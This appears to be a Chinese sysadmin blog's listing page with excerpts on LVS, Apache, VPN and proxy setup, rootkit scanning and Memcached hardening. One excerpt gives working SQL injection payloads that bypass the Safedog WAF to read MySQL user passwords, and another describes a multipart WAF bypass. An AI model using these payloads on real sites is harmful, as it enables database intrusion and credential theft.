利用LVS 快速实现负载均衡 发布时间: 2019-09-13 02:11:40 评论数: 0
模型一:NAT模型的配置实验环境:采用VMware虚拟机,版本6.0.5操作系统:Red Hat Enterprise Linux 5 (2.6.18)虚拟机1:充当Director:网卡1(桥接):192.168.0.33(对外),网卡2(Vmnet):10.0.0.1(对内)虚拟机2:充当RS1:IP:10.0.0.11虚拟机3:充当RS2:IP:10.0.0.12设置工作环境: # 在Director上安装ipvsadm yum install ipvsadm # 在RS1和RS2上这样配置 yum install httpd mysql ......
apache配置泛域名301跳转到新的泛域名 发布时间: 2019-09-12 23:52:40 评论数: 0
需求:将域名lvtao.net所有的二维域名301到新的lvtao.org,例如:www.lvtao.net到www.lvtao.org,medoo.lvtao.net到medoo.lvtao.org. ServerName lvtao.net ServerAlias *.lvtao.net DocumentRoot /www/lvtao.net RewriteEngine on RewriteRule ^(.+) %{HTTP_HOST}$1 [C] RewriteRule ^([^.]+).lv ......
windows2003单网卡架设VPN访问facebook图文攻略 发布时间: 2019-09-12 23:29:33 评论数: 0
好久没用过了,记录一下。部分截图来自网络看图文1.打开路由和远程访问工具或者开始→设置→控制面板→管理工具→路由和远程访问,选择“配置并启用路由和远程访问”2.系统会提示你安装路由和远程访问,点击下一步。 3.选择“自定义配置”,因为我们是使用单网卡,只能选择自定义配置,再点击下一步,如下图所示: 4.选择“VPN访问”,我们只启用VPN服务,如图1-3所示: 5.VPN服务基本配置完毕,现将开始服务,选择“是”,最后点击完成即可。6.再次打开“路由和远程访问”,鼠标右击“计算机名(本地)”,选择属性,对VPN进行详细配置, 如IP地址池配置(建议设置为静态地址,且静态地址 ......
linux下rootkit检测扫描工具rootkit hunter的安装使用 发布时间: 2019-09-12 08:15:29 评论数: 0
下载:Project: http://www.rootkit.nl/projects/rootkit_hunter.html download: http://downloads.sourceforge.net/rkhunter/rkhunter-1.4.2.tar.gz?use_mirror=jaist解压安装:解压 #tar -zxvf rkhunter-1.3.4.tar.gz 安装 #cd rkhunter-1.3.4 #./installer.sh -h Usage: ./installer.sh Ordered v ......
apache 2种日志 发布时间: 2019-09-10 11:56:31 评论数: 0
apache日志主要有两个,一个是apache访问日志,一个是apache错误日志 apache访问日志主要是记录了所有对apache服务器的访问活动。 访问日志记录的内容可以在apache配置那里修改 CustomLog /www/logs/access_log common#记录对Web站点的每个进入请求 CustomLog用来指示Apache的访问日志存放的位置,apache官方说明CustomLog指令可以同时完成指定日志文件和定义日志格式 apache日志还可以定制日志文件格式 格式字符串 描述 %% 百分号(Apache2.0.44或更高的版本) %a 远 ......
一步步打造每秒百万请求的高性能Web集群 发布时间: 2019-09-10 07:24:38 评论数: 0
如何生成每秒百万级别的 HTTP 请求?负载生成工具(Load-Generating Tools)在进行负责测试时要牢记一件重要的事:你能在 Linux 上建立多少个 socket 连接。这个限制是硬编码在内核里的,最典型的就是临时 W 端口的限制。(在某种程度上)你可以在 /etc/sysctl.conf 里扩展它。但是基本上,一台 Linux 机器只能同时打开大约 64,000 个 socket 。因此在负载测试时,我们不得不通过在单一的连接上尽可能多地发出请求来充分利用 socket 。 除此之外,我们还需要不止一台的机器来产生负载。否则,负载生成器会把可用的 socke ......
windows下使用火狐浏览器插件AutoProxy+MyEnTunnel+SSH访问海外站点 发布时间: 2019-09-09 19:46:41 评论数: 0
平时需要查阅一些技术资料,光走VPN太浪费流量,所以这儿教大家一种使用火狐浏览器的插件 AutoProxy+MyEnTunnel+SSH 的方法,以下教程图片居多,不做特别过多介绍:1.首先你得有一个镜外的SSH账号,可以是自己VPS的,也可以网上找找免费的SSH代理账号2.安装一个火狐浏览器,并安装Firefox浏览器的扩展AutoProxy https://addons.mozilla.org/zh-cn/firefox/addon/11009/安装完后要重启火狐浏览器,启动时请注意这个插件的一个提示,记得勾上gfwList的规则,然后打开 AutoProxy首选项——选择 ......
服务器安全狗POST SQL注入. 发布时间: 2019-09-08 21:38:54 评论数: 0
不知为何不拦POST的/!XXX/id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1id=1200000  /*!union*//*!select*/(1),user,password from mysql.user limit 0,1
记一次内网中phpcms故障处理之windows2003+php运行越用越慢 发布时间: 2019-09-08 15:55:26 评论数: 0
前几天一朋友给我说,他帮两个政府单位服务的两个网站,差不多同时间出现了访问一段时间后,网站打开就非常慢的情况.主机环境是windows2003+apache+PHP+mysql,但如果把apache重启一下就OK,又非常快.我的第一反应就是apache的线程不够用,看了一下错误日志,的确也提示线程不够了,修改了一下apache的线程 StartServers 8 MinSpareServers 5 MaxSpareServers 20 MaxClien ......
伪静态原理 发布时间: 2019-09-07 07:00:06 评论数: 0
了解伪静态之前,先要了解什么是静态页面, 静态页面就是不需要服务器解析过的html代码,不了解html代码的先了解一下,静态页面的格式一般为html 所以静态页面的代码一般我们叫HTML代码 来做个测试就知道了 新建test.html文件 www.phpsong.com 这个是www.phpsong.com网站 保存好直接双击 你会看到如下图界面 好了接下来讲什么 ......
Windows XP连接ltppVPN设置图文教程 发布时间: 2019-09-06 11:07:10 评论数: 0
创建一个VPN连接:设置完就可以连接了 ......
Memcached UDP 安全漏洞处理 发布时间: 2019-09-05 10:26:23 评论数: 0
检查echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211如果没有返回内容就表示你可能会中标啦...或者使用nmap扫描nmap TARGET -p 11211 -sU -sS --script memcached-info修复方案:1.启动参加增加禁用UDPmemcached -U 02.如果只是本地使用,启用只监听本地memcached -l 127.0.0.13.防火墙策略仅允许本地ip访问服务(通过iptable限制)iptables -t filter -A IN ......
ubuntu apt源及php相关扩展安装 发布时间: 2019-09-05 04:26:28 评论数: 0
查看当前系统版本cat /etc/issue更新源地址及缓存,记得先备份sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak sudo vim /etc/apt/sources.list 替换为deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial main restricted universe multiverse deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-security main restri ......
apache虚拟主机配置 发布时间: 2019-09-03 23:11:56 评论数: 0
我发现周围同事都在配置虚拟主机的时候都喜欢配置在httpd.conf,在上海公司的标准环境里也都是这么搞得,其实apache给我们提供了配置的一个文件 下面来操作一下 ①查看使用虚拟主要使用配置文件 开启apache 配置文件httpd.conf,找到 Include conf/extra/httpd-vhosts.conf 找到上面的配置项,如果前面有“#”,去掉 ②配置虚拟主机 NameVirtualHost *:80 DocumentRoot "D:/phpsong/" ServerName www.ph ......
轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 发布时间: 2019-09-03 20:55:32 评论数: 0
XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。构建如下HTML表单: y ......
centos下搭建VPN服务器之pptp 发布时间: 2019-09-03 19:01:55 评论数: 0
虚拟专用网(VPN)被定义为通过一个公用网络(通常是因特网)建立一个临时的、安全的连接,是一条穿过混乱的公用网络的安全、稳定的隧道。虚拟专用网是 对企业内部网的扩展。虚拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接,并保证数据的安全传输。虚拟专用网 可用于不断增长的移动用户的全球因特网接入,以实现安全连接;可用于实现企业网站之间安全通信的虚拟专用线路,用于经济有效地连接到商业伙伴和用户的安全 外联网虚拟专用网。PPTP 全称为 Point to Point Tunneling Protocol -- 点到点隧道协议,是VPN协议中的一种 ......
CentOS安装OpenVPN 支持证书登录或账号密码登录 发布时间: 2019-09-01 06:11:09 评论数: 0
OpenVPN是不同于PPTP、L2TP的另一种VPN软件包,基于SSL的VPN。OpenVPN使用需要客户端支持。这里系统为CentOS6.4。 一、检查OpenVPN所需环境 OpenVPN需要TUN设备支持,还需要iptables的nat模块支持。 1、检查TUN模块:modinfo tun显示如下: 如果报错则不支持TUN设备。 2、在OpenVZ虚拟化的VPS上,需要管理员在母鸡上打开TUN/TAP设备。cat /dev/net/tun如果返回:cat: /dev/net/tun: File descriptor in bad stateVPS的TUN/TAP已经可 ......
apache开启目录浏览功能 发布时间: 2019-08-31 21:50:17 评论数: 0
主配置文件 httpd.conf 中修改:1)添加支持模块。LoadModule autoindex_module modules/mod_autoindex.so LoadModule dir_module modules/mod_dir.so注意一定要拥有这两个模块,否则下面的配置不生效,返回404 Not Found错误。这个模块也有可能直接编译到Apache核心文件httpd中去了。2)为DocumentRoot目录添加Options Indexes,即可生成目录。 Options Indexes FollowSym ......
网站为什么易被入侵? 发布时间: 2019-08-31 16:45:58 评论数: 0
网站大致可分为几大块以及使用开源/闭源程序,如何加固? 网站程序的采用:??? 尽量采用大厂商提供的程序??? 关注一些安全厂商以及官方微博,第一时间获取是否出现新漏洞??? 市面上开源所能提供的已经很广泛了,没有特殊需要无所谓非要自己重新写套程序服务器权限的配置:??? 关闭不需要的服务以及端口??? 定期的更新系统补丁??? 使用安全防御软件,例如安全狗、啊D等??? 文件列目录等权限最小化,尽量消减Guest权限??? 网站数据库不再使用ROOT权限,分配相应用户管理Other:??? 使用WAF服务,例如加速乐、安全宝等??? 弱口令是大忌!??? 谨记权限最小化! ......
nginx和apache哪个好 发布时间: 2019-08-30 16:30:38 评论数: 0
nginx和apache哪个好?对于这个本人觉得比较难回答,因为各有个的好处 nginx相对于apache,它的好处在于,并发量更高,内存占用跟少,低资源低消耗高性能 2011年4月的统计数据,Apache依然占有62.71%,而Nginx是7.35%,为什么apache还有这么高的占用率 apache相对于nginx有哪些好处,rewrite比nginx更强大,支持的模块多,bug少,稳定 对web server的选择,大部分情况下nginx都优于APACHE,比如说静态文件处理、PHP-CGI的支持、反向代理功能、前端Cache、维持连接等等。在Apache+PHP(prefor ......